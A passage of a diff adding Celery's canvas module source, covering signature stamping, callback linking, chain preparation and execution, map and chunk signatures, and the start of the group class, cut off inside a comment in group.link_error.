+ headers (Dict): Stamps that should be added to headers. + + Returns: + Dict: Merged stamps. + """ + # Use append_stamps=False to prioritize visitor_headers over headers in case of duplicated stamps. + # This will lose duplicated headers from the headers argument, but that is the best effort solution + # to avoid implicitly casting the duplicated stamp into a list of both stamps from headers and + # visitor_headers of the same key. + # Example: + # headers = {"foo": "bar1"} + # visitor_headers = {"foo": "bar2"} + # _merge_dictionaries(headers, visitor_headers, aggregate_duplicates=True) + # headers["foo"] == ["bar1", "bar2"] -> The stamp is now a list + # _merge_dictionaries(headers, visitor_headers, aggregate_duplicates=False) + # headers["foo"] == "bar2" -> "bar1" is lost, but the stamp is according to the visitor + + headers = headers.copy() + + if "stamped_headers" not in headers: + headers["stamped_headers"] = list(headers.keys()) + + # Merge headers with visitor headers + if visitor_headers is not None: + visitor_headers = visitor_headers or {} + if "stamped_headers" not in visitor_headers: + visitor_headers["stamped_headers"] = list(visitor_headers.keys()) + + # Sync from visitor + _merge_dictionaries(headers, visitor_headers, aggregate_duplicates=append_stamps) + headers["stamped_headers"] = list(set(headers["stamped_headers"])) + + # Merge headers with self.options + if self_headers: + stamped_headers = set(headers.get("stamped_headers", [])) + stamped_headers.update(self.options.get("stamped_headers", [])) + headers["stamped_headers"] = list(stamped_headers) + # Only merge stamps that are in stamped_headers from self.options + redacted_options = {k: v for k, v in self.options.items() if k in headers["stamped_headers"]} + + # Sync from self.options + _merge_dictionaries(headers, redacted_options, aggregate_duplicates=append_stamps) + headers["stamped_headers"] = list(set(headers["stamped_headers"])) + + return headers + + def stamp(self, visitor=None, append_stamps=False, **headers): + """Stamp this signature with additional custom headers. + Using a visitor will pass on responsibility for the stamping + to the visitor. + + .. versionadded:: 5.3 + + Arguments: + visitor (StampingVisitor): Visitor API object. + append_stamps (bool): + If True, duplicated stamps will be appended to a list. + If False, duplicated stamps will be replaced by the last stamp. + headers (Dict): Stamps that should be added to headers. + """ + self.stamp_links(visitor, append_stamps, **headers) + headers = headers.copy() + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_signature(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + return self.set(**headers) + + def stamp_links(self, visitor, append_stamps=False, **headers): + """Stamp this signature links (callbacks and errbacks). + Using a visitor will pass on responsibility for the stamping + to the visitor. + + Arguments: + visitor (StampingVisitor): Visitor API object. + append_stamps (bool): + If True, duplicated stamps will be appended to a list. + If False, duplicated stamps will be replaced by the last stamp. + headers (Dict): Stamps that should be added to headers. + """ + non_visitor_headers = headers.copy() + + # When we are stamping links, we want to avoid adding stamps from the linked signature itself + # so we turn off self_headers to stamp the link only with the visitor and the headers. 
+ # If it's enabled, the link copies the stamps of the linked signature, and we don't want that. + self_headers = False + + # Stamp all of the callbacks of this signature + headers = deepcopy(non_visitor_headers) + for link in maybe_list(self.options.get('link')) or []: + link = maybe_signature(link, app=self.app) + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_callback(link, **headers) or {} + headers = self._stamp_headers( + visitor_headers=visitor_headers, + append_stamps=append_stamps, + self_headers=self_headers, + **headers + ) + link.stamp(visitor, append_stamps, **headers) + + # Stamp all of the errbacks of this signature + headers = deepcopy(non_visitor_headers) + for link in maybe_list(self.options.get('link_error')) or []: + link = maybe_signature(link, app=self.app) + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_errback(link, **headers) or {} + headers = self._stamp_headers( + visitor_headers=visitor_headers, + append_stamps=append_stamps, + self_headers=self_headers, + **headers + ) + link.stamp(visitor, append_stamps, **headers) + + def _with_list_option(self, key): + """Gets the value at the given self.options[key] as a list. + + If the value is not a list, it will be converted to one and saved in self.options. + If the key does not exist, an empty list will be set and returned instead. + + Arguments: + key (str): The key to get the value for. + + Returns: + List: The value at the given key as a list or an empty list if the key does not exist. + """ + items = self.options.setdefault(key, []) + if not isinstance(items, MutableSequence): + items = self.options[key] = [items] + return items + + def append_to_list_option(self, key, value): + """Appends the given value to the list at the given key in self.options.""" + items = self._with_list_option(key) + if value not in items: + items.append(value) + return value + + def extend_list_option(self, key, value): + """Extends the list at the given key in self.options with the given value. + + If the value is not a list, it will be converted to one. + """ + items = self._with_list_option(key) + items.extend(maybe_list(value)) + + def link(self, callback): + """Add callback task to be applied if this task succeeds. + + Returns: + Signature: the argument passed, for chaining + or use with :func:`~functools.reduce`. + """ + return self.append_to_list_option('link', callback) + + def link_error(self, errback): + """Add callback task to be applied on error in task execution. + + Returns: + Signature: the argument passed, for chaining + or use with :func:`~functools.reduce`. + """ + return self.append_to_list_option('link_error', errback) + + def on_error(self, errback): + """Version of :meth:`link_error` that supports chaining. + + on_error chains the original signature, not the errback so:: + + >>> add.s(2, 2).on_error(errback.s()).delay() + + calls the ``add`` task, not the ``errback`` task, but the + reverse is true for :meth:`link_error`. + """ + self.link_error(errback) + return self + + def flatten_links(self): + """Return a recursive list of dependencies. + + "unchain" if you will, but with links intact. + """ + return list(itertools.chain.from_iterable(itertools.chain( + [[self]], + (link.flatten_links() + for link in maybe_list(self.options.get('link')) or []) + ))) + + def __or__(self, other): + """Chaining operator. + + Example: + >>> add.s(2, 2) | add.s(4) | add.s(8) + + Returns: + chain: Constructs a :class:`~celery.canvas.chain` of the given signatures. 
+ """ + if isinstance(other, _chain): + # task | chain -> chain + return _chain(seq_concat_seq( + (self,), other.unchain_tasks()), app=self._app) + elif isinstance(other, group): + # unroll group with one member + other = maybe_unroll_group(other) + # task | group() -> chain + return _chain(self, other, app=self.app) + elif isinstance(other, Signature): + # task | task -> chain + return _chain(self, other, app=self._app) + return NotImplemented + + def __ior__(self, other): + # Python 3.9 introduces | as the merge operator for dicts. + # We override the in-place version of that operator + # so that canvases continue to work as they did before. + return self.__or__(other) + + def election(self): + type = self.type + app = type.app + tid = self.options.get('task_id') or uuid() + + with app.producer_or_acquire(None) as producer: + props = type.backend.on_task_call(producer, tid) + app.control.election(tid, 'task', + self.clone(task_id=tid, **props), + connection=producer.connection) + return type.AsyncResult(tid) + + def reprcall(self, *args, **kwargs): + """Return a string representation of the signature. + + Merges the given arguments with the signature's arguments + only for the purpose of generating the string representation. + The signature itself is not modified. + + Example: + >>> add.s(2, 2).reprcall() + 'add(2, 2)' + """ + args, kwargs, _ = self._merge(args, kwargs, {}, force=True) + return reprcall(self['task'], args, kwargs) + + def __deepcopy__(self, memo): + memo[id(self)] = self + return dict(self) # TODO: Potential bug of being a shallow copy + + def __invert__(self): + return self.apply_async().get() + + def __reduce__(self): + # for serialization, the task type is lazily loaded, + # and not stored in the dict itself. + return signature, (dict(self),) + + def __json__(self): + return dict(self) + + def __repr__(self): + return self.reprcall() + + def items(self): + for k, v in super().items(): + yield k.decode() if isinstance(k, bytes) else k, v + + @property + def name(self): + # for duck typing compatibility with Task.name + return self.task + + @cached_property + def type(self): + return self._type or self.app.tasks[self['task']] + + @cached_property + def app(self): + return self._app or current_app + + @cached_property + def AsyncResult(self): + try: + return self.type.AsyncResult + except KeyError: # task not registered + return self.app.AsyncResult + + @cached_property + def _apply_async(self): + try: + return self.type.apply_async + except KeyError: + return _partial(self.app.send_task, self['task']) + + id = getitem_property('options.task_id', 'Task UUID') + parent_id = getitem_property('options.parent_id', 'Task parent UUID.') + root_id = getitem_property('options.root_id', 'Task root UUID.') + task = getitem_property('task', 'Name of task.') + args = getitem_property('args', 'Positional arguments to task.') + kwargs = getitem_property('kwargs', 'Keyword arguments to task.') + options = getitem_property('options', 'Task execution options.') + subtask_type = getitem_property('subtask_type', 'Type of signature') + immutable = getitem_property( + 'immutable', 'Flag set if no longer accepts new arguments') + + +def _prepare_chain_from_options(options, tasks, use_link): + # When we publish groups we reuse the same options dictionary for all of + # the tasks in the group. See: + # https://github.com/celery/celery/blob/fb37cb0b8/celery/canvas.py#L1022. 
+ # Issue #5354 reported that the following type of canvases + # causes a Celery worker to hang: + # group( + # add.s(1, 1), + # add.s(1, 1) + # ) | tsum.s() | add.s(1) | group(add.s(1), add.s(1)) + # The resolution of #5354 in PR #5681 was to only set the `chain` key + # in the options dictionary if it is not present. + # Otherwise we extend the existing list of tasks in the chain with the new + # tasks: options['chain'].extend(chain_). + # Before PR #5681 we overrode the `chain` key in each iteration + # of the loop which applies all the tasks in the group: + # options['chain'] = tasks if not use_link else None + # This caused Celery to execute chains correctly in most cases since + # in each iteration the `chain` key would reset itself to a new value + # and the side effect of mutating the key did not propagate + # to the next task in the group. + # Since we now mutated the `chain` key, a *list* which is passed + # by *reference*, the next task in the group will extend the list + # of tasks in the chain instead of setting a new one from the chain_ + # variable above. + # This causes Celery to execute a chain, even though there might not be + # one to begin with. Alternatively, it causes Celery to execute more tasks + # that were previously present in the previous task in the group. + # The solution is to be careful and never mutate the options dictionary + # to begin with. + # Here is an example of a canvas which triggers this issue: + # add.s(5, 6) | group((add.s(1) | add.s(2), add.s(3))). + # The expected result is [14, 14]. However, when we extend the `chain` + # key the `add.s(3)` task erroneously has `add.s(2)` in its chain since + # it was previously applied to `add.s(1)`. + # Without being careful not to mutate the options dictionary, the result + # in this case is [16, 14]. + # To avoid deep-copying the entire options dictionary every single time we + # run a chain we use a ChainMap and ensure that we never mutate + # the original `chain` key, hence we use list_a + list_b to create a new + # list. + if use_link: + return ChainMap({'chain': None}, options) + elif 'chain' not in options: + return ChainMap({'chain': tasks}, options) + elif tasks is not None: + # chain option may already be set, resulting in + # "multiple values for keyword argument 'chain'" error. + # Issue #3379. + # If a chain already exists, we need to extend it with the next + # tasks in the chain. + # Issue #5354. + # WARNING: Be careful not to mutate `options['chain']`. 
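+        # Illustrative sketch (not part of the original source): if
+        #   options['chain'] == [t3] and tasks == [t2, t1]
+        # the ChainMap below exposes chain == [t3, t2, t1] while the original
+        # options dictionary is never mutated.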
+ return ChainMap({'chain': options['chain'] + tasks}, + options) + + +@Signature.register_type(name='chain') +class _chain(Signature): + tasks = getitem_property('kwargs.tasks', 'Tasks in chain.') + + @classmethod + def from_dict(cls, d, app=None): + tasks = d['kwargs']['tasks'] + if tasks: + if isinstance(tasks, tuple): # aaaargh + tasks = d['kwargs']['tasks'] = list(tasks) + tasks = [maybe_signature(task, app=app) for task in tasks] + return cls(tasks, app=app, **d['options']) + + def __init__(self, *tasks, **options): + tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0]) + else tasks) + super().__init__('celery.chain', (), {'tasks': tasks}, **options + ) + self._use_link = options.pop('use_link', None) + self.subtask_type = 'chain' + self._frozen = None + + def __call__(self, *args, **kwargs): + if self.tasks: + return self.apply_async(args, kwargs) + + def __or__(self, other): + if isinstance(other, group): + # unroll group with one member + other = maybe_unroll_group(other) + # chain | group() -> chain + tasks = self.unchain_tasks() + if not tasks: + # If the chain is empty, return the group + return other + if isinstance(tasks[-1], chord): + # CHAIN [last item is chord] | GROUP -> chain with chord body. + tasks[-1].body = tasks[-1].body | other + return type(self)(tasks, app=self.app) + # use type(self) for _chain subclasses + return type(self)(seq_concat_item( + tasks, other), app=self._app) + elif isinstance(other, _chain): + # chain | chain -> chain + # use type(self) for _chain subclasses + return type(self)(seq_concat_seq( + self.unchain_tasks(), other.unchain_tasks()), app=self._app) + elif isinstance(other, Signature): + if self.tasks and isinstance(self.tasks[-1], group): + # CHAIN [last item is group] | TASK -> chord + sig = self.clone() + sig.tasks[-1] = chord( + sig.tasks[-1], other, app=self._app) + return sig + elif self.tasks and isinstance(self.tasks[-1], chord): + # CHAIN [last item is chord] -> chain with chord body. + sig = self.clone() + sig.tasks[-1].body = sig.tasks[-1].body | other + return sig + else: + # chain | task -> chain + # use type(self) for _chain subclasses + return type(self)(seq_concat_item( + self.unchain_tasks(), other), app=self._app) + else: + return NotImplemented + + def clone(self, *args, **kwargs): + to_signature = maybe_signature + signature = super().clone(*args, **kwargs) + signature.kwargs['tasks'] = [ + to_signature(sig, app=self._app, clone=True) + for sig in signature.kwargs['tasks'] + ] + return signature + + def unchain_tasks(self): + """Return a list of tasks in the chain. + + The tasks list would be cloned from the chain's tasks. + All of the chain callbacks would be added to the last task in the (cloned) chain. + All of the tasks would be linked to the same error callback + as the chain itself, to ensure that the correct error callback is called + if any of the (cloned) tasks of the chain fail. + """ + # Clone chain's tasks assigning signatures from link_error + # to each task and adding the chain's links to the last task. + tasks = [t.clone() for t in self.tasks] + for sig in maybe_list(self.options.get('link')) or []: + tasks[-1].link(sig) + for sig in maybe_list(self.options.get('link_error')) or []: + for task in tasks: + task.link_error(sig) + return tasks + + def apply_async(self, args=None, kwargs=None, **options): + # python is best at unpacking kwargs, so .run is here to do that. 
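+        # Illustrative usage (not part of the original source):
+        #   (add.s(2, 2) | add.s(4)).apply_async()
+        # runs eagerly when task_always_eager is enabled, otherwise the call
+        # is delegated to self.run() below.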
+ args = args if args else () + kwargs = kwargs if kwargs else [] + app = self.app + + if app.conf.task_always_eager: + with allow_join_result(): + return self.apply(args, kwargs, **options) + return self.run(args, kwargs, app=app, **( + dict(self.options, **options) if options else self.options)) + + def run(self, args=None, kwargs=None, group_id=None, chord=None, + task_id=None, link=None, link_error=None, publisher=None, + producer=None, root_id=None, parent_id=None, app=None, + group_index=None, **options): + """Executes the chain. + + Responsible for executing the chain in the correct order. + In a case of a chain of a single task, the task is executed directly + and the result is returned for that task specifically. + """ + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + args = args if args else () + kwargs = kwargs if kwargs else [] + app = app or self.app + use_link = self._use_link + if use_link is None and app.conf.task_protocol == 1: + use_link = True + args = (tuple(args) + tuple(self.args) + if args and not self.immutable else self.args) + + # Unpack nested chains/groups/chords + tasks, results_from_prepare = self.prepare_steps( + args, kwargs, self.tasks, root_id, parent_id, link_error, app, + task_id, group_id, chord, group_index=group_index, + ) + + # For a chain of single task, execute the task directly and return the result for that task + # For a chain of multiple tasks, execute all of the tasks and return the AsyncResult for the chain + if results_from_prepare: + if link: + tasks[0].extend_list_option('link', link) + first_task = tasks.pop() + options = _prepare_chain_from_options(options, tasks, use_link) + + result_from_apply = first_task.apply_async(**options) + # If we only have a single task, it may be important that we pass + # the real result object rather than the one obtained via freezing. + # e.g. For `GroupResult`s, we need to pass back the result object + # which will actually have its promise fulfilled by the subtasks, + # something that will never occur for the frozen result. + if not tasks: + return result_from_apply + else: + return results_from_prepare[0] + + # in order for a chain to be frozen, each of the members of the chain individually needs to be frozen + # TODO figure out why we are always cloning before freeze + def freeze(self, _id=None, group_id=None, chord=None, + root_id=None, parent_id=None, group_index=None): + # pylint: disable=redefined-outer-name + # XXX chord is also a class in outer scope. + _, results = self._frozen = self.prepare_steps( + self.args, self.kwargs, self.tasks, root_id, parent_id, None, + self.app, _id, group_id, chord, clone=False, + group_index=group_index, + ) + return results[0] + + def stamp(self, visitor=None, append_stamps=False, **headers): + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_chain_start(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.stamp_links(visitor, **headers) + + for task in self.tasks: + task.stamp(visitor, append_stamps, **headers) + + if visitor is not None: + visitor.on_chain_end(self, **headers) + + def prepare_steps(self, args, kwargs, tasks, + root_id=None, parent_id=None, link_error=None, app=None, + last_task_id=None, group_id=None, chord_body=None, + clone=True, from_dict=Signature.from_dict, + group_index=None): + """Prepare the chain for execution. + + To execute a chain, we first need to unpack it correctly. 
+ During the unpacking, we might encounter other chains, groups, or chords + which we need to unpack as well. + + For example: + chain(signature1, chain(signature2, signature3)) --> Upgrades to chain(signature1, signature2, signature3) + chain(group(signature1, signature2), signature3) --> Upgrades to chord([signature1, signature2], signature3) + + The responsibility of this method is to ensure that the chain is + correctly unpacked, and then the correct callbacks are set up along the way. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + tasks (List[Signature]): The tasks of the chain. + root_id (str): The id of the root task. + parent_id (str): The id of the parent task. + link_error (Union[List[Signature], Signature]): The error callback. + will be set for all tasks in the chain. + app (Celery): The Celery app instance. + last_task_id (str): The id of the last task in the chain. + group_id (str): The id of the group that the chain is a part of. + chord_body (Signature): The body of the chord, used to synchronize with the chain's + last task and the chord's body when used together. + clone (bool): Whether to clone the chain's tasks before modifying them. + from_dict (Callable): A function that takes a dict and returns a Signature. + + Returns: + Tuple[List[Signature], List[AsyncResult]]: The frozen tasks of the chain, and the async results + """ + app = app or self.app + # use chain message field for protocol 2 and later. + # this avoids pickle blowing the stack on the recursion + # required by linking task together in a tree structure. + # (why is pickle using recursion? or better yet why cannot python + # do tail call optimization making recursion actually useful?) + use_link = self._use_link + if use_link is None and app.conf.task_protocol == 1: + use_link = True + steps = deque(tasks) + + # optimization: now the pop func is a local variable + steps_pop = steps.pop + steps_extend = steps.extend + + prev_task = None + prev_res = None + tasks, results = [], [] + i = 0 + # NOTE: We are doing this in reverse order. + # The result is a list of tasks in reverse order, that is + # passed as the ``chain`` message field. + # As it's reversed the worker can just do ``chain.pop()`` to + # get the next task in the chain. + while steps: + task = steps_pop() + # if steps is not empty, this is the first task - reverse order + # if i = 0, this is the last task - again, because we're reversed + is_first_task, is_last_task = not steps, not i + + if not isinstance(task, abstract.CallableSignature): + task = from_dict(task, app=app) + if isinstance(task, group): + # when groups are nested, they are unrolled - all tasks within + # groups should be called in parallel + task = maybe_unroll_group(task) + + # first task gets partial args from chain + if clone: + if is_first_task: + task = task.clone(args, kwargs) + else: + task = task.clone() + elif is_first_task: + task.args = tuple(args) + tuple(task.args) + + if isinstance(task, _chain): + # splice (unroll) the chain + steps_extend(task.tasks) + continue + + # TODO why isn't this asserting is_last_task == False? + if isinstance(task, group) and prev_task: + # automatically upgrade group(...) | s to chord(group, s) + # for chords we freeze by pretending it's a normal + # signature instead of a group. 
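+                # Illustrative sketch (not part of the original source):
+                #   chain(group(add.s(1), add.s(2)), tsum.s())
+                # reaches this branch and is rewritten as
+                #   chord([add.s(1), add.s(2)], tsum.s())
+                # with ``prev_task`` (tsum.s()) becoming the chord body.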
+ tasks.pop() + results.pop() + try: + task = chord( + task, body=prev_task, + task_id=prev_res.task_id, root_id=root_id, app=app, + ) + except AttributeError: + # A GroupResult does not have a task_id since it consists + # of multiple tasks. + # We therefore, have to construct the chord without it. + # Issues #5467, #3585. + task = chord( + task, body=prev_task, + root_id=root_id, app=app, + ) + + if is_last_task: + # chain(task_id=id) means task id is set for the last task + # in the chain. If the chord is part of a chord/group + # then that chord/group must synchronize based on the + # last task in the chain, so we only set the group_id and + # chord callback for the last task. + res = task.freeze( + last_task_id, + root_id=root_id, group_id=group_id, chord=chord_body, + group_index=group_index, + ) + else: + res = task.freeze(root_id=root_id) + + i += 1 + + if prev_task: + if use_link: + # link previous task to this task. + task.link(prev_task) + + if prev_res and not prev_res.parent: + prev_res.parent = res + + if link_error: + for errback in maybe_list(link_error): + task.link_error(errback) + + tasks.append(task) + results.append(res) + + prev_task, prev_res = task, res + if isinstance(task, chord): + app.backend.ensure_chords_allowed() + # If the task is a chord, and the body is a chain + # the chain has already been prepared, and res is + # set to the last task in the callback chain. + + # We need to change that so that it points to the + # group result object. + node = res + while node.parent: + node = node.parent + prev_res = node + return tasks, results + + def apply(self, args=None, kwargs=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + last, (fargs, fkwargs) = None, (args, kwargs) + for task in self.tasks: + res = task.clone(fargs, fkwargs).apply( + last and (last.get(),), **dict(self.options, **options)) + res.parent, last, (fargs, fkwargs) = last, res, (None, None) + return last + + @property + def app(self): + app = self._app + if app is None: + try: + app = self.tasks[0]._app + except LookupError: + pass + return app or current_app + + def __repr__(self): + if not self.tasks: + return f'<{type(self).__name__}@{id(self):#x}: empty>' + return remove_repeating_from_task( + self.tasks[0]['task'], + ' | '.join(repr(t) for t in self.tasks)) + + +class chain(_chain): + """Chain tasks together. + + Each tasks follows one another, + by being applied as a callback of the previous task. + + Note: + If called with only one argument, then that argument must + be an iterable of tasks to chain: this allows us + to use generator expressions. + + Example: + This is effectively :math:`((2 + 2) + 4)`: + + .. code-block:: pycon + + >>> res = chain(add.s(2, 2), add.s(4))() + >>> res.get() + 8 + + Calling a chain will return the result of the last task in the chain. + You can get to the other tasks by following the ``result.parent``'s: + + .. code-block:: pycon + + >>> res.parent.get() + 4 + + Using a generator expression: + + .. code-block:: pycon + + >>> lazy_chain = chain(add.s(i) for i in range(10)) + >>> res = lazy_chain(3) + + Arguments: + *tasks (Signature): List of task signatures to chain. + If only one argument is passed and that argument is + an iterable, then that'll be used as the list of signatures + to chain instead. This means that you can use a generator + expression. + + Returns: + ~celery.chain: A lazy signature that can be called to apply the first + task in the chain. 
When that task succeeds the next task in the + chain is applied, and so on. + """ + + # could be function, but must be able to reference as :class:`chain`. + def __new__(cls, *tasks, **kwargs): + # This forces `chain(X, Y, Z)` to work the same way as `X | Y | Z` + if not kwargs and tasks: + if len(tasks) != 1 or is_list(tasks[0]): + tasks = tasks[0] if len(tasks) == 1 else tasks + # if is_list(tasks) and len(tasks) == 1: + # return super(chain, cls).__new__(cls, tasks, **kwargs) + new_instance = reduce(operator.or_, tasks, _chain()) + if cls != chain and isinstance(new_instance, _chain) and not isinstance(new_instance, cls): + return super().__new__(cls, new_instance.tasks, **kwargs) + return new_instance + return super().__new__(cls, *tasks, **kwargs) + + +class _basemap(Signature): + _task_name = None + _unpack_args = itemgetter('task', 'it') + + @classmethod + def from_dict(cls, d, app=None): + return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']) + + def __init__(self, task, it, **options): + super().__init__(self._task_name, (), + {'task': task, 'it': regen(it)}, immutable=True, **options + ) + + def apply_async(self, args=None, kwargs=None, **opts): + # need to evaluate generators + args = args if args else () + kwargs = kwargs if kwargs else {} + task, it = self._unpack_args(self.kwargs) + return self.type.apply_async( + (), {'task': task, 'it': list(it)}, + route_name=task_name_from(self.kwargs.get('task')), **opts + ) + + +@Signature.register_type() +class xmap(_basemap): + """Map operation for tasks. + + Note: + Tasks executed sequentially in process, this is not a + parallel operation like :class:`group`. + """ + + _task_name = 'celery.map' + + def __repr__(self): + task, it = self._unpack_args(self.kwargs) + return f'[{task.task}(x) for x in {truncate(repr(it), 100)}]' + + +@Signature.register_type() +class xstarmap(_basemap): + """Map operation for tasks, using star arguments.""" + + _task_name = 'celery.starmap' + + def __repr__(self): + task, it = self._unpack_args(self.kwargs) + return f'[{task.task}(*x) for x in {truncate(repr(it), 100)}]' + + +@Signature.register_type() +class chunks(Signature): + """Partition of tasks into chunks of size n.""" + + _unpack_args = itemgetter('task', 'it', 'n') + + @classmethod + def from_dict(cls, d, app=None): + return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']) + + def __init__(self, task, it, n, **options): + super().__init__('celery.chunks', (), + {'task': task, 'it': regen(it), 'n': n}, + immutable=True, **options + ) + + def __call__(self, **options): + return self.apply_async(**options) + + def apply_async(self, args=None, kwargs=None, **opts): + args = args if args else () + kwargs = kwargs if kwargs else {} + return self.group().apply_async( + args, kwargs, + route_name=task_name_from(self.kwargs.get('task')), **opts + ) + + def group(self): + # need to evaluate generators + task, it, n = self._unpack_args(self.kwargs) + return group((xstarmap(task, part, app=self._app) + for part in _chunks(iter(it), n)), + app=self._app) + + @classmethod + def apply_chunks(cls, task, it, n, app=None): + return cls(task, it, n, app=app)() + + +def _maybe_group(tasks, app): + if isinstance(tasks, dict): + tasks = signature(tasks, app=app) + + if isinstance(tasks, (group, _chain)): + tasks = tasks.tasks + elif isinstance(tasks, abstract.CallableSignature): + tasks = [tasks] + else: + if isinstance(tasks, GeneratorType): + tasks = regen(signature(t, app=app) for t in tasks) + else: + tasks = [signature(t, app=app) for 
t in tasks] + return tasks + + +@Signature.register_type() +class group(Signature): + """Creates a group of tasks to be executed in parallel. + + A group is lazy so you must call it to take action and evaluate + the group. + + Note: + If only one argument is passed, and that argument is an iterable + then that'll be used as the list of tasks instead: this + allows us to use ``group`` with generator expressions. + + Example: + >>> lazy_group = group([add.s(2, 2), add.s(4, 4)]) + >>> promise = lazy_group() # <-- evaluate: returns lazy result. + >>> promise.get() # <-- will wait for the task to return + [4, 8] + + Arguments: + *tasks (List[Signature]): A list of signatures that this group will + call. If there's only one argument, and that argument is an + iterable, then that'll define the list of signatures instead. + **options (Any): Execution options applied to all tasks + in the group. + + Returns: + ~celery.group: signature that when called will then call all of the + tasks in the group (and return a :class:`GroupResult` instance + that can be used to inspect the state of the group). + """ + + tasks = getitem_property('kwargs.tasks', 'Tasks in group.') + + @classmethod + def from_dict(cls, d, app=None): + """Create a group signature from a dictionary that represents a group. + + Example: + >>> group_dict = { + "task": "celery.group", + "args": [], + "kwargs": { + "tasks": [ + { + "task": "add", + "args": [ + 1, + 2 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + }, + { + "task": "add", + "args": [ + 3, + 4 + ], + "kwargs": {}, + "options": {}, + "subtask_type": None, + "immutable": False + } + ] + }, + "options": {}, + "subtask_type": "group", + "immutable": False + } + >>> group_sig = group.from_dict(group_dict) + + Iterates over the given tasks in the dictionary and convert them to signatures. + Tasks needs to be defined in d['kwargs']['tasks'] as a sequence + of tasks. + + The tasks themselves can be dictionaries or signatures (or both). + """ + # We need to mutate the `kwargs` element in place to avoid confusing + # `freeze()` implementations which end up here and expect to be able to + # access elements from that dictionary later and refer to objects + # canonicalized here + orig_tasks = d["kwargs"]["tasks"] + d["kwargs"]["tasks"] = rebuilt_tasks = type(orig_tasks)( + maybe_signature(task, app=app) for task in orig_tasks + ) + return cls(rebuilt_tasks, app=app, **d['options']) + + def __init__(self, *tasks, **options): + if len(tasks) == 1: + tasks = tasks[0] + if isinstance(tasks, group): + tasks = tasks.tasks + if isinstance(tasks, abstract.CallableSignature): + tasks = [tasks.clone()] + if not isinstance(tasks, _regen): + # May potentially cause slow downs when using a + # generator of many tasks - Issue #6973 + tasks = regen(tasks) + super().__init__('celery.group', (), {'tasks': tasks}, **options + ) + self.subtask_type = 'group' + + def __call__(self, *partial_args, **options): + return self.apply_async(partial_args, **options) + + def __or__(self, other): + # group() | task -> chord + return chord(self, body=other, app=self._app) + + def skew(self, start=1.0, stop=None, step=1.0): + # TODO: Not sure if this is still used anywhere (besides its own tests). Consider removing. 
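+        # Illustrative sketch (not part of the original source):
+        #   group(add.s(i, i) for i in range(3)).skew(start=1, stop=3)
+        # sets countdown=1, 2, 3 on the three tasks respectively.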
+ it = fxrange(start, stop, step, repeatlast=True) + for task in self.tasks: + task.set(countdown=next(it)) + return self + + def apply_async(self, args=None, kwargs=None, add_to_parent=True, + producer=None, link=None, link_error=None, **options): + args = args if args else () + if link is not None: + raise TypeError('Cannot add link to group: use a chord') + if link_error is not None: + raise TypeError( + 'Cannot add link to group: do that on individual tasks') + app = self.app + if app.conf.task_always_eager: + return self.apply(args, kwargs, **options) + if not self.tasks: + return self.freeze() + + options, group_id, root_id = self._freeze_gid(options) + tasks = self._prepared(self.tasks, [], group_id, root_id, app) + p = barrier() + results = list(self._apply_tasks(tasks, producer, app, p, + args=args, kwargs=kwargs, **options)) + result = self.app.GroupResult(group_id, results, ready_barrier=p) + p.finalize() + + # - Special case of group(A.s() | group(B.s(), C.s())) + # That is, group with single item that's a chain but the + # last task in that chain is a group. + # + # We cannot actually support arbitrary GroupResults in chains, + # but this special case we can. + if len(result) == 1 and isinstance(result[0], GroupResult): + result = result[0] + + parent_task = app.current_worker_task + if add_to_parent and parent_task: + parent_task.add_trail(result) + return result + + def apply(self, args=None, kwargs=None, **options): + args = args if args else () + kwargs = kwargs if kwargs else {} + app = self.app + if not self.tasks: + return self.freeze() # empty group returns GroupResult + options, group_id, root_id = self._freeze_gid(options) + tasks = self._prepared(self.tasks, [], group_id, root_id, app) + return app.GroupResult(group_id, [ + sig.apply(args=args, kwargs=kwargs, **options) for sig, _, _ in tasks + ]) + + def set_immutable(self, immutable): + for task in self.tasks: + task.set_immutable(immutable) + + def stamp(self, visitor=None, append_stamps=False, **headers): + visitor_headers = None + if visitor is not None: + visitor_headers = visitor.on_group_start(self, **headers) or {} + headers = self._stamp_headers(visitor_headers, append_stamps, **headers) + self.stamp_links(visitor, append_stamps, **headers) + + if isinstance(self.tasks, _regen): + self.tasks.map(_partial(_stamp_regen_task, visitor=visitor, append_stamps=append_stamps, **headers)) + else: + new_tasks = [] + for task in self.tasks: + task = maybe_signature(task, app=self.app) + task.stamp(visitor, append_stamps, **headers) + new_tasks.append(task) + if isinstance(self.tasks, MutableSequence): + self.tasks[:] = new_tasks + else: + self.tasks = new_tasks + + if visitor is not None: + visitor.on_group_end(self, **headers) + + def link(self, sig): + # Simply link to first task. Doing this is slightly misleading because + # the callback may be executed before all children in the group are + # completed and also if any children other than the first one fail. + # + # The callback signature is cloned and made immutable since it the + # first task isn't actually capable of passing the return values of its + # siblings to the callback task. + sig = sig.clone().set(immutable=True) + return self.tasks[0].link(sig) + + def link_error(self, sig): + # Any child task might error so we need to ensure that they are all + # capable of calling the linked error signature. This opens the + # possibility that the task is called more than once but that's better + # than it not being called at all. 
